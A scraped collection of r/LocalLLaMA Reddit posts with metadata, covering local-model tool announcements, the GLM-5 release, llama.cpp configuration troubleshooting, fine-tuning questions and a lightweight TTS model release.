Please roast it / poke holes. Also: if you’ve got your own setup, I’d love to see it!
You can check out some example workflows here [https://github.com/reliant-labs/reliant](https://github.com/reliant-labs/reliant)
Latest release has support for Codex subscriptions and local models -- no additional costs or fees on our end. | 2026-02-11T17:21:17 | https://www.reddit.com/r/LocalLLaMA/comments/1r23fi5/i_built_a_workflow_tool_for_running_multiple_or/ | reliant-labs | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r23fi5 | false | null | t3_1r23fi5 | /r/LocalLLaMA/comments/1r23fi5/i_built_a_workflow_tool_for_running_multiple_or/ | false | false | self | 2 | {'enabled': False, 'images': [{'id': 'A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=108&crop=smart&auto=webp&s=46abe831c458d0807706fe47d730b1489343544a', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=216&crop=smart&auto=webp&s=6ef6bb4ed43453008ec40b3dc8b3ef3bf72af380', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=320&crop=smart&auto=webp&s=5f3a157f8b7a200791341b61779344e5bf4043bc', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=640&crop=smart&auto=webp&s=bc6fc1a68d1edf5cf1dab1a37f36f698be9171f9', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=960&crop=smart&auto=webp&s=daab1f0a24557dfae302a1ae57407859aba8bb96', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?width=1080&crop=smart&auto=webp&s=39b2745eee1abec175e71525b547388ec82d7ca7', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/A6RxTkiY6n0tPHRexdFdeE_FeE8rDU_hTAIZeScWh20.png?auto=webp&s=bb7518a5345dcc6f8fd6d8539ec4760ac9649048', 'width': 1200}, 'variants': {}}]} |
Shadow Coding: A better alternative to Vibe Coding | 0 | Vibe Coding always felt counter-intuitive to me. As a developer, I think in code, not paragraphs.
To have to translate the rough-code in my head to english, give it to the AI, only for it to figure out what I want and translate it back into code - while spending precious time & tokens - felt like an unnecessary detour.
So I built Shadow Code, a VSCode extension that allows me to convert the pseudocode in my head to clean, accurate, high-quality code - using cheaper/open-source models and fewer tokens!
Do check it out!
* [Github Link.](https://github.com/adifyr/shadow-code)
* [YouTube Link](https://youtu.be/ZoNDQYYpl7E) | 2026-02-11T17:19:01 | https://v.redd.it/6hw95gelfwig1 | KanJuicy | v.redd.it | 1970-01-01T00:00:00 | 0 | {} | 1r23d95 | false | {'reddit_video': {'bitrate_kbps': 5000, 'dash_url': 'https://v.redd.it/6hw95gelfwig1/DASHPlaylist.mpd?a=1773422357%2COTc1ZDcyMzA0NmE2MmVhOTZlYThiYjU3ZmVjMWM3MWJjYWY4OWIzMzJlNWVjMzkyNWFjNTgzZTNkMGZlNjZiZQ%3D%3D&v=1&f=sd', 'duration': 24, 'fallback_url': 'https://v.redd.it/6hw95gelfwig1/CMAF_1080.mp4?source=fallback', 'has_audio': True, 'height': 1080, 'hls_url': 'https://v.redd.it/6hw95gelfwig1/HLSPlaylist.m3u8?a=1773422357%2CMjk4NDkzMmIxNTgyNTI2Y2Y0ZWEyNzE3Yjk5NzE0NmRkNjU0NjgzMGU3ODZkMGE5YzEzMDMwMjFlNmEzNTFiOA%3D%3D&v=1&f=sd', 'is_gif': False, 'scrubber_media_url': 'https://v.redd.it/6hw95gelfwig1/CMAF_96.mp4', 'transcoding_status': 'completed', 'width': 1910}} | t3_1r23d95 | /r/LocalLLaMA/comments/1r23d95/shadow_coding_a_better_alternative_to_vibe_coding/ | false | false | 0 | {'enabled': False, 'images': [{'id': 'ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy', 'resolutions': [{'height': 61, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=108&crop=smart&format=pjpg&auto=webp&s=8525d297aabef49c339a8c27e522fa0bfddee74b', 'width': 108}, {'height': 122, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=216&crop=smart&format=pjpg&auto=webp&s=3695f258360ab722502a623480ee8dbab861725a', 'width': 216}, {'height': 180, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=320&crop=smart&format=pjpg&auto=webp&s=a98e6347dffbac0f429af204c4311fc60b0ad124', 'width': 320}, {'height': 361, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=640&crop=smart&format=pjpg&auto=webp&s=481cd2f1165545a82a13f13f872d360f9c5830df', 'width': 640}, {'height': 542, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=960&crop=smart&format=pjpg&auto=webp&s=012ea2de9f3e6b8562a3d86736f071bd4c62e741', 'width': 960}, {'height': 610, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?width=1080&crop=smart&format=pjpg&auto=webp&s=3de27f5cdc0b45cddd6fcee092e99489a60cd622', 'width': 1080}], 'source': {'height': 1628, 'url': 'https://external-preview.redd.it/ejI0Ym42Z2xmd2lnMajpRFyYFYkb08WrPvWRGjCM1ae0-ff96V1HBupVo5oy.png?format=pjpg&auto=webp&s=0259a7a0c2824f394ba2762e6048a0911e6d4677', 'width': 2880}, 'variants': {}}]} | |
Qwen3-Next-Coder is almost unusable to me. Why? What I missed? | 1 | Everyone talks about Qwen3-Next-Coder like it's some kind of miracle for local coding… yet I find it incredibly slow and almost unusable with Opencode or Claude Code.
Today I was so frustrated that I literally took apart a second PC just to connect its GPU to mine and get more VRAM.
And still… it’s so slow that it’s basically unusable!
Maybe I’m doing something wrong using Q4\_K\_XL?
I’m sure the mistake is on my end — it can’t be that everyone loves this model and I’m the only one struggling.
I’ve also tried the smaller quantized versions, but they start making mistakes after around 400 lines of generated code — even with simple HTML or JavaScript.
I’m honestly speechless… everyone praising this model and I can’t get it to run decently.
For what it’s worth (which is nothing), I actually find GLM4.7-flash much more effective.
Maybe this is irrelevant, but just in case… I’m using Unsloth GGUFs and an updated version of llama.cpp.
Can anyone help me understand what I’m doing wrong?
This is how I’m launching the local llama-server, and I did a LOT of tests to improve things:
llama-server --model models\Qwen3-Coder-Next-UD-Q4_K_XL.gguf \
--alias "unsloth/Qwen3-Coder-Next" \
--port 8001 \
--ctx-size 32072 \
--ubatch-size 4096 \
--batch-size 4096 \
--flash-attn on \
--fit on \
--seed 3407 \
--temp 1.0 \
--top-p 0.95 \
--min-p 0.01 \
--top-k 40 \
--jinja
At first I left the KV cache at default (FP16, I think), then I reduced it and only saw a drop in TPS… I mean, with just a few dozen tokens per second fixed, it’s impossible to work efficiently. | 2026-02-11T17:16:47 | https://www.reddit.com/r/LocalLLaMA/comments/1r23b0u/qwen3nextcoder_is_almost_unusable_to_me_why_what/ | Medium-Technology-79 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r23b0u | false | null | t3_1r23b0u | /r/LocalLLaMA/comments/1r23b0u/qwen3nextcoder_is_almost_unusable_to_me_why_what/ | false | false | self | 1 | null |
NeuroIndex | 0 | Most RAG systems fail because vector search alone is not enough.
They retrieve similar chunks — but miss relationships.
So I built NeuroIndex:
A hybrid Vector + Semantic Graph architecture that improves retrieval depth for LLM applications.
It combines:
Vector similarity
Entity relationship mapping
Context linking
Result: More structured and explainable RAG outputs.
website:- nidhitek
Looking for feedback from builders working on LLM infra. | 2026-02-11T17:11:03 | https://www.reddit.com/r/LocalLLaMA/comments/1r23532/neuroindex/ | OwnPerspective9543 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r23532 | false | null | t3_1r23532 | /r/LocalLLaMA/comments/1r23532/neuroindex/ | false | false | self | 0 | null |
GLM-5 Benchmarks (model not yet published on HF) | 1 | 2026-02-11T16:57:35 | https://docs.z.ai/guides/llm/glm-5 | TheRealMasonMac | docs.z.ai | 1970-01-01T00:00:00 | 0 | {} | 1r22ris | false | null | t3_1r22ris | /r/LocalLLaMA/comments/1r22ris/glm5_benchmarks_model_not_yet_published_on_hf/ | false | false | 1 | {'enabled': False, 'images': [{'id': '711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40', 'resolutions': [{'height': 56, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=108&crop=smart&auto=webp&s=2b527b33b6ccb6922d82d0b228bdf231a2762989', 'width': 108}, {'height': 113, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=216&crop=smart&auto=webp&s=68196714293a29326c8c9f58ba2792a6075a4aac', 'width': 216}, {'height': 168, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=320&crop=smart&auto=webp&s=88aed924c6e2f9d514be4494953b6bb4e3c48930', 'width': 320}, {'height': 336, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=640&crop=smart&auto=webp&s=2aaf1c3749a75b5dcfc81db3d307d15ecaba1f98', 'width': 640}, {'height': 504, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=960&crop=smart&auto=webp&s=07b811e47fb88e514f93088f24e06c0f0076ccba', 'width': 960}, {'height': 567, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?width=1080&crop=smart&auto=webp&s=8edf9fb4f47853ff3eb9ac7b3da677ef3b34fe7d', 'width': 1080}], 'source': {'height': 630, 'url': 'https://external-preview.redd.it/711tjKjpilpDgegIwJ7SKMORRU0sheMZaG5F-f1PP40.png?auto=webp&s=073d1d2dc364d050e070eacaa0afc5c32a12fa56', 'width': 1200}, 'variants': {}}]} | ||
[Help] Fine-tuning Llama-3-8B for Low-Resource Language (Sinhala) - Stuck between "Bad Logic" and "Word Salad" | 7 | I am working on a project to build a story generation tool for children (Ages 6- 10) in Sinhala (a low-resource language), but I am hitting a critical roadblock with fine-tuning. I am using Unsloth with Llama-3-8B on an A100 GPU and have a dataset of \~2,500 stories. My issue is that the **Base model** (fine-tuned with Alpaca format) produces good grammar but complete nonsense logic (hallucinations like "Water is victory"), whereas the **Instruct model** (also fine-tuned with Alpaca format) attempts to follow logic but outputs broken "word salad" sentences. I suspect my prompt formatting is the issue with the Instruct model, but given the small dataset size, I am unsure if I should switch to the Llama-3 Chat Template with the Instruct model or simply train the Base model longer to fix the logic. Any advice on the best strategy for locking in grammar *and* logic for a non-English language would be appreciated. | 2026-02-11T16:52:48 | https://www.reddit.com/r/LocalLLaMA/comments/1r22myf/help_finetuning_llama38b_for_lowresource_language/ | Annual-Captain-7642 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r22myf | false | null | t3_1r22myf | /r/LocalLLaMA/comments/1r22myf/help_finetuning_llama38b_for_lowresource_language/ | false | false | self | 7 | null |
Open-source AI coworker that builds a knowledge graph from your work (runs locally with Ollama) | 0 | We built a different approach to "AI memory" for work.
Instead of passing raw emails and meeting transcripts into a model each time, Rowboat maintains a continuously updated knowledge graph organized around people, projects, organizations, and topics.
Each node is stored as plain Markdown with backlinks, so it's human-readable and editable. The graph acts as an index over structured notes. Rowboat runs background agents that convert raw data to linked-notes while doing entity resolution.
An agent runs on top of that structure and retrieves relevant nodes before taking action.
The app runs locally, supports multiple LLM providers (including local models), and keeps the knowledge graph on your machine.
Still early and evolving. Curious how folks here think about this type of knowledge graph for work memory.
Demo: [https://www.youtube.com/watch?v=5AWoGo-L16I](https://www.youtube.com/watch?v=5AWoGo-L16I)
GitHub: [https://github.com/rowboatlabs/rowboat](https://github.com/rowboatlabs/rowboat) | 2026-02-11T16:47:33 | https://www.reddit.com/r/LocalLLaMA/comments/1r22hoh/opensource_ai_coworker_that_builds_a_knowledge/ | Prestigious_Peak_773 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r22hoh | false | null | t3_1r22hoh | /r/LocalLLaMA/comments/1r22hoh/opensource_ai_coworker_that_builds_a_knowledge/ | false | false | self | 0 | {'enabled': False, 'images': [{'id': 'zhWxJShQ21vz_PzOWlpF1MldJL6nzK9om_pfvRATtRo', 'resolutions': [{'height': 81, 'url': 'https://external-preview.redd.it/zhWxJShQ21vz_PzOWlpF1MldJL6nzK9om_pfvRATtRo.jpeg?width=108&crop=smart&auto=webp&s=02ba5ef87cfbb0c37432303be8187c77a0259c5a', 'width': 108}, {'height': 162, 'url': 'https://external-preview.redd.it/zhWxJShQ21vz_PzOWlpF1MldJL6nzK9om_pfvRATtRo.jpeg?width=216&crop=smart&auto=webp&s=ac58751d4ed30a5541857f157ee4ccebf91c4dde', 'width': 216}, {'height': 240, 'url': 'https://external-preview.redd.it/zhWxJShQ21vz_PzOWlpF1MldJL6nzK9om_pfvRATtRo.jpeg?width=320&crop=smart&auto=webp&s=289b3a232902a54ab4a98014637ab955b426ee57', 'width': 320}], 'source': {'height': 360, 'url': 'https://external-preview.redd.it/zhWxJShQ21vz_PzOWlpF1MldJL6nzK9om_pfvRATtRo.jpeg?auto=webp&s=bf18dc6dd1ae7a8a010802c7ccbd5447c8b8a871', 'width': 480}, 'variants': {}}]} |
GLM-5 Officially Released | 753 | We are launching GLM-5, targeting complex systems engineering and long-horizon agentic tasks. Scaling is still one of the most important ways to improve the intelligence efficiency of Artificial General Intelligence (AGI). Compared to GLM-4.5, GLM-5 scales from 355B parameters (32B active) to 744B parameters (40B active), and increases pre-training data from 23T to 28.5T tokens. GLM-5 also integrates DeepSeek Sparse Attention (DSA), significantly reducing deployment cost while preserving long-context capacity.
Blog: https://z.ai/blog/glm-5
Hugging Face: https://huggingface.co/zai-org/GLM-5
GitHub: https://github.com/zai-org/GLM-5 | 2026-02-11T16:47:29 | https://www.reddit.com/gallery/1r22hlq | ResearchCrafty1804 | reddit.com | 1970-01-01T00:00:00 | 0 | {} | 1r22hlq | false | null | t3_1r22hlq | /r/LocalLLaMA/comments/1r22hlq/glm5_officially_released/ | false | false | 753 | null | |
GLM5 benchmarks | 29 | 2026-02-11T16:43:57 | https://www.reddit.com/r/LocalLLaMA/comments/1r22e37/glm5_benchmarks/ | Simple_Split5074 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r22e37 | false | null | t3_1r22e37 | /r/LocalLLaMA/comments/1r22e37/glm5_benchmarks/ | false | false | 29 | null | ||
GLM-5: From Vibe Coding to Agentic Engineering | 52 | 2026-02-11T16:42:30 | https://z.ai/blog/glm-5 | ShreckAndDonkey123 | z.ai | 1970-01-01T00:00:00 | 0 | {} | 1r22co6 | false | null | t3_1r22co6 | /r/LocalLLaMA/comments/1r22co6/glm5_from_vibe_coding_to_agentic_engineering/ | false | false | default | 52 | null | |
RLHF limits what LLMs can claim, not what they can do — 26 experimental conditions across Claude Haiku and Sonnet | 0 | 2026-02-11T16:33:10 | https://emberverse.ai/haiku-garden/paper_yellow_wallpaper_problem.html | Odd_Rule_3745 | emberverse.ai | 1970-01-01T00:00:00 | 0 | {} | 1r223h8 | false | null | t3_1r223h8 | /r/LocalLLaMA/comments/1r223h8/rlhf_limits_what_llms_can_claim_not_what_they_can/ | false | false | default | 0 | null | |
Community Evals on Hugging Face | 25 | hey! I'm Nathan (SaylorTwift) from huggingface we have a big update from the hf hub that actually fixes one of the most annoying things about model evaluation.
[Humanity's Last exam dataset on Hugging Face](https://preview.redd.it/iijfx1dk5wig1.png?width=1049&format=png&auto=webp&s=1a544cd848e26b2ff06d926dae85d711495f3bb6)
community evals are now live on huggingface! it's a decentralized, transparent way for the community to report and share model evaluations.
why ?
everyone’s stats are scattered across papers, model cards, platforms and sometimes contradict each other. there’s no unified single source of truth. community evals aim to fix that by making eval reporting open and reproducible.
what's changed ?
* benchmarks host leaderboards right in the dataset repo (e.g. mmlu-pro, gpqa, hle)
* models store their own results in .eval\_results/\*.yaml and they show up on model cards and feed into the dataset leaderboards.
* anyone can submit eval results via a pr without needing the model author to merge. those show up as community results.
the key idea is that scores aren’t hidden in black-box leaderboards anymore. everyone can see who ran what, how, and when, and build tools, dashboards, comparisons on top of that!
If you want to [read more](https://huggingface.co/blog/community-evals) | 2026-02-11T16:23:19 | https://www.reddit.com/r/LocalLLaMA/comments/1r21tzb/community_evals_on_hugging_face/ | HauntingMoment | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r21tzb | false | null | t3_1r21tzb | /r/LocalLLaMA/comments/1r21tzb/community_evals_on_hugging_face/ | false | false | 25 | null | |
We've built memory into 4 different agent systems. Here's what actually works and what's a waste of time. | 34 | After building memory layers for multiple agent setups, here's the shit nobody tells you in the tutorials.
**What's a waste of time:**
\- **"Just use a vector store"** \-- Congrats, you built keyword search with extra steps and worse debugging. Embeddings are great for fuzzy matching, terrible for precise retrieval. Your agent will confidently pull up something *semantically similar* instead of the *actual thing it needs*.
\- **Dumping full conversation logs as memory** \-- Your agent doesn't need to remember that the user said "thanks" 47 times. Unfiltered logs are noise with a few signal fragments buried in them. And you're burning tokens retrieving garbage.
\- **One retrieval strategy** \-- If you're only doing semantic search, you're missing exact matches. If you're only doing keyword search, you're missing relationships. Pick one and you'll spend months wondering why retrieval "feels off."
**What actually works:**
\- **Entity resolution pipelines.** Actively identify and link entities across conversations. "The Postgres migration," "that DB move we discussed," and "the thing Jake proposed last Tuesday" are the same thing. If your memory doesn't know that, it's broken.
\- **Temporal tagging.** When was this learned? Is it still valid? A decision from 3 months ago might be reversed. If your memory treats everything as equally fresh, your agent will confidently act on outdated context. Timestamps aren't metadata. They're core to whether a memory is useful.
\- **Explicit priority systems.** Not everything is worth remembering. Let users or systems mark what matters and what should decay. Without this you end up with a memory that "remembers" everything equally, which means it effectively remembers nothing.
\- **Contradiction detection.** Your system will inevitably store conflicting information. "We're using Redis for caching" and "We moved off Redis last sprint." If you silently store both, your agent flips a coin on which one it retrieves. Flag conflicts. Surface them. Let a human resolve it.
\- **Multi-strategy retrieval.** Run keyword, semantic, and graph traversal in parallel. Merge results. The answer to "why did we pick this architecture?" might be spread across a design doc, a Slack thread, and a PR description. No single strategy finds all three.
**The uncomfortable truth:**
None of this "solves" memory. These are tactical patches for specific retrieval problems. But implemented carefully, they make systems that *feel* like memory instead of feeling like a database you have to babysit.
The bar isn't "perfect recall." The bar is "better than asking the same question twice."
What's actually working in your setups? | 2026-02-11T16:17:39 | https://www.reddit.com/r/LocalLLaMA/comments/1r21ojm/weve_built_memory_into_4_different_agent_systems/ | arapkuliev | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r21ojm | false | null | t3_1r21ojm | /r/LocalLLaMA/comments/1r21ojm/weve_built_memory_into_4_different_agent_systems/ | false | false | self | 34 | null |
new to coding LLM - hardware requirements | 0 | I am new to this kind of stuff, but I plan to use it in my daily work as software developer.
I have some i7 11800H, A3000, 64 GB notebook as working device.
I am not quite sure about the model, but I planned to try qwen3 and 14B model with q4 should run on the device, and also the 30B and 32B might work, maybe q2 version?
ChatGPT tells me I could expect 5-15TPS, which is not ideal. Also it freezes all my resources for the LLM and if I want the run I would need the gpu anyway and I guess I would need to close OpenCode and the LLM before, which is rather annoying.
I also have a Mac Studio M2 Max with 32GB RAM, which should work with the 14B model, the 30B and 32B might not work and sadly I cannot upgrade the RAM. A benefit of that Apple Silicon seems the architecture and those MLX stuff and according to ChatGPT I should expect 25-60 TPS which would be quite good.
I switched to a Macbook Pro M4 Max with 36GB as private main device 1 year ago, so I don't use the Mac Studio anymore, so I maybe could use that as private LLM server for open code, so I can use it with my working device, as well as with my private Macbook? Is there a better model that I could use than qwen3 14B or is it sufficient? Our company has a really large project, does qwen3 14B and OpenCode understand this and knows our internal SDK if I give them the repository? It seems there is something called RAG I need there? Is it enough to have that repository on my working device and OpenCode runs there locally and sends the necessary information via API to my Mac Studio?
Is there a better model for my needs and hardware I got?
It seems we can use Claude with Ollama since some weeks, but there is also OpenCode. I thought about using OpenCode, but I saw some videos about Claude, and e.g. that switch between modes like plan mode seems nice to have, but not sure if OpenCode has that function too.
Using my Macbook Pro M4 Max 36GB as LLM Server for my working device would also not make much sense I guess. The CPU might not be the limitation, but would 4GB more RAM help? I am also very sceptical since it seems when using my local LLM my Mac would be always at its limit? Is that the case, thats it like 100% utilization when I ask it to code something for me and if it is finished it would go back to like 10% or is it in "idle" also consuming that much power and ressources? The Mac Studio would have better cooling I guess and I think there was also some kind of cooling stand for it. So I think the Mac Studio would be the better option? | 2026-02-11T16:17:32 | https://www.reddit.com/r/LocalLLaMA/comments/1r21of6/new_to_coding_llm_hardware_requirements/ | SubstantialBee5097 | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r21of6 | false | null | t3_1r21of6 | /r/LocalLLaMA/comments/1r21of6/new_to_coding_llm_hardware_requirements/ | false | false | self | 0 | null |
Add Kimi-K2.5 support | 90 | 2026-02-11T15:48:39 | https://github.com/ggml-org/llama.cpp/pull/19170 | jacek2023 | github.com | 1970-01-01T00:00:00 | 0 | {} | 1r20wki | false | null | t3_1r20wki | /r/LocalLLaMA/comments/1r20wki/add_kimik25_support/ | false | false | 90 | {'enabled': False, 'images': [{'id': '5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I', 'resolutions': [{'height': 54, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=108&crop=smart&auto=webp&s=6461068566b4ffbf2ea8bd9f53ee47ad99b85ee8', 'width': 108}, {'height': 108, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=216&crop=smart&auto=webp&s=7b53d2f0b6772f9e0435874ff1689da90a9a6dec', 'width': 216}, {'height': 160, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=320&crop=smart&auto=webp&s=11fd89e010ee5ce616013a57e224da3675b63271', 'width': 320}, {'height': 320, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=640&crop=smart&auto=webp&s=58c51ab74c9a734ec60838d3f67b78c6df26076b', 'width': 640}, {'height': 480, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=960&crop=smart&auto=webp&s=e6ad5d712e6f2652a41095e67f5cfde14d21bb39', 'width': 960}, {'height': 540, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?width=1080&crop=smart&auto=webp&s=842e6308be3dff66da2e2109c3cdc0c09427f6b9', 'width': 1080}], 'source': {'height': 600, 'url': 'https://external-preview.redd.it/5gup_oD4lytsLI1wID-Zo3RkPiRxiRbU2Hm7r-fkB2I.png?auto=webp&s=5b55aeed4446b5b24cf06dd7246f7e664672cc9b', 'width': 1200}, 'variants': {}}]} | ||
Releasing MioTTS: A family of lightweight, fast LLM-based TTS models (0.1B - 2.6B) with Zero-shot Voice Cloning | 60 | Hey r/LocalLLaMA,
I’ve been developing a personal project to create a lightweight and fast TTS model. Today I’m releasing **MioTTS**, a family of LLM-based models ranging from **0.1B to 2.6B** parameters.
The main focus was to achieve high-fidelity audio at the 0.1B parameter scale. I wanted to see how efficient it could be while maintaining quality, so I also developed a custom neural audio codec (**MioCodec**) to minimize latency.
**Key Features:**
* **Zero-shot Voice Cloning:** Supports high-fidelity cloning from short reference audio.
* **Bilingual:** Trained on \~100k hours of English and Japanese speech data.
* **Custom Codec:** Built on top of **MioCodec**, a custom neural audio codec I developed to allow for faster generation (low token rate) while maintaining audio fidelity. The codec is also released under MIT license.
**Model Family:**
I’ve released multiple sizes to balance quality and resource usage. Licenses depend on the base model used.
|Model|Base Model|License|RTF (approx.)|
|:-|:-|:-|:-|
|**0.1B**|Falcon-H1-Tiny|Falcon-LLM|0.04 - 0.05|
|**0.4B**|LFM2-350M|LFM Open v1.0|0.035 - 0.045|
|**0.6B**|Qwen3-0.6B|Apache 2.0|0.055 - 0.065|
|**1.2B**|LFM2.5-1.2B|LFM Open v1.0|0.065 - 0.075|
|**1.7B**|Qwen3-1.7B|Apache 2.0|0.10 - 0.11|
|**2.6B**|LFM2-2.6B|LFM Open v1.0|0.135 - 0.145|
I'd love to hear your feedback, especially on the English prosody (since I primarily develop in Japanese) and inference speeds on different hardware.
**Links:**
* **Model Collection:** [https://huggingface.co/collections/Aratako/miotts](https://huggingface.co/collections/Aratako/miotts)
* **Inference Code:** [https://github.com/Aratako/MioTTS-Inference](https://github.com/Aratako/MioTTS-Inference)
* **Demo (0.1B):** [https://huggingface.co/spaces/Aratako/MioTTS-0.1B-Demo](https://huggingface.co/spaces/Aratako/MioTTS-0.1B-Demo)
Thanks for checking it out! | 2026-02-11T15:46:56 | https://www.reddit.com/r/LocalLLaMA/comments/1r20uwk/releasing_miotts_a_family_of_lightweight_fast/ | Askxc | self.LocalLLaMA | 1970-01-01T00:00:00 | 0 | {} | 1r20uwk | false | null | t3_1r20uwk | /r/LocalLLaMA/comments/1r20uwk/releasing_miotts_a_family_of_lightweight_fast/ | false | false | self | 60 | {'enabled': False, 'images': [{'id': 'GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI', 'resolutions': [{'height': 58, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=108&crop=smart&auto=webp&s=686ce73862c94180eecf52e4f992ae03abf8db7a', 'width': 108}, {'height': 116, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=216&crop=smart&auto=webp&s=2d73811f9a8ffc8975ced6791aeaf0e06d2ef9d9', 'width': 216}, {'height': 172, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=320&crop=smart&auto=webp&s=41133aa7242cc8b1c0b9be6f2f02e6a5c92f9e3e', 'width': 320}, {'height': 345, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=640&crop=smart&auto=webp&s=f1f35fe3cf0d68be727cdcff1a8fbe1886274aec', 'width': 640}, {'height': 518, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=960&crop=smart&auto=webp&s=e9e67cfb12ff9795a6a9e919f181da89dd519d3d', 'width': 960}, {'height': 583, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?width=1080&crop=smart&auto=webp&s=4878e82bda62199bbd46e8172cf8eca61ea8bfdb', 'width': 1080}], 'source': {'height': 648, 'url': 'https://external-preview.redd.it/GvCI9r7clboBsw15C_RBC1DocY_sNLE6v3oaQer8sLI.png?auto=webp&s=cf3a2b7b872acb3309cedacae10f032e3191afa3', 'width': 1200}, 'variants': {}}]} |
Prompt Mixer - a desktop app to steer your LLM in real-time. | 1 | **What is this?**
A desktop app that allows to define a set of system prompts and dynamically steer the LLM output between them in real-time. It works with local LLMs and aimed to explore of how high-level control of LLMs/agents might look like in the future.
You might find the project source code here:
